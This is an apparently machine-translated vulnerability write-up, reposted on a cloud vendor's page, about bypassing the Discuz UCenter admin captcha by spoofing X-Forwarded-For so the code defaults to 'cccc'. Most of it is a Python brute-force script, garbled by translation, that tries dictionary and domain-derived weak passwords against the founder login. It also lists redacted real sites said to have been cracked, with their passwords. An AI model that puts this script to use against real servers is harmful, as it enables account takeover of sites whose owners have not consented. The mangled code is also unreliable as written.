Discuz's UCenter founder password can be cracked (in some cases)

Source: Internet
Author: User

Discuz's UCenter founder password can be cracked (in some cases)

Without looking at the source code, you can directly test it in the black box. Non-verification code recognition.
So attach several success stories using code +.

Http: // 192.168.1.105/discuz/uc_server/admin. php
 



Contains a verification code

The Verification Code address is

Http: // localhost/discuz/uc_server/admin. php? M = seccode & seccodeauth = 250 dIGq % 2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94 & 7500



However

Tested and found

When you log on to uc_server, if the ip address appears for the first time, the default value of seccode is cccc.

The IP address is obtained through X-Forwarded-.

That is, after we modify the xff ip address, open the above verification code url again. The image value is cccc.
 



Therefore, you can write a program to crack the password by modifying the value of X-Forwarded-.
 

The program has been written as follows. (Code slag, sorry .) Take the Founder's password as an example. The Administrator's password should also work.
 

<Poc> # coding: utf-8import httplib, re, random, urllib, timefrom sys import argv # crack def getHtml (host, htmlhash, htmlpass, htmlseccode): ip = str (random. randint (1,100) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) + ". "+ str (random. randint (100,244) postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv: 33.0) gecko/20100101 Firefox/33.0 "," X-Forwarded-For ": ip, 'content-Typ E ': 'application/x-www-form-urlencoded', 'accept': 'text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 ', 'connection ': 'Keep-alive'} postContent = 'sid = & formhash = '+ htmlhash +' & seccodehidden = '+ htmlseccode +' & iframe = 0 & isfounder = 1 & password = '+ htmlpass + '& seccode = cccc & submit = % E7 % 99% BB + % E5 % BD % 95' resultHtml = httplib. HTTPConnection (host, 80, False) resultHtml. request ('post', '/uc_server/admin. php? M = user & a = login ', body = postContent, headers = postHead) page = resultHtml. getresponse () pageConect = page. read () return pageConect # Get formhash and seccodehiddendef gethashs (host): url = 'HTTP: // '+ host +'/uc_server/admin. php 'pagecontent = urllib. urlopen (url ). read () r1 = re. compile ('<input type = "hidden" name = "formhash" value = "(\ S +)"/>') htmlhash = r1.findall (pageContent) [0] r2 = re. compile ('<input type = "hidden" name = "seccodehidden" value = "(\ S +)"/>') htmlseccode = r2.findall (pageContent) [0] return htmlhash + ''+ htmlseccode # obtain the host dictionary interval through argv for blasting if (len (argv) = 1 ): print '----> python' + argv [0] + 'host address dictionary file interval 'print' ----> python' + argv [0] + '192.168.1.105 pass.txt 0.2' else: host = argv [1] passfile = argv [2] sleeptime = argv [3] print 'website host is '+ host # retrieve domain name and then add some passwords hostuser = host. split ('. ') hostuser = hostuser [len (hostuser)-2] hostpass = [hostuser + '000000', hostuser + '000000', hostuser + hostuser, hostuser + '.. ', hostuser + '. ', hostuser + 'admin888', hostuser + 'admin123', hostuser + 'admin ', hostuser + '000000'] print 'the password dictionary is' + passfileprint '. The interval is' + sleeptimeprint '---> 'X = gethashs (host ). split ('') f = open (passfile, 'R') htmlpass = f. read (). split ('\ r \ n') htmlpass = hostpass + htmlpassf. close () for I in range (len (htmlpass): time. sleep (float (sleeptime) print 'attempt password' + htmlpass [I] if (getHtml (host, x [0], htmlpass [I], x [1]) = ''): print '. The password is' + htmlpass [I] break </poc>

 



Python dz_blast.py 192.168.1.117 pass.txt 0

192.168.1.117 dz built in a new Virtual Machine

 





Attached success stories

Without such a dictionary at hand, I just added a few passwords to test, which are common weak passwords.



 

1.http://**.**.**/ admin123456_2.http://**.**.**/  admin_3.http://**.**.**/  123456

 


 


 


 


 

Solution:

Enhanced verification

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.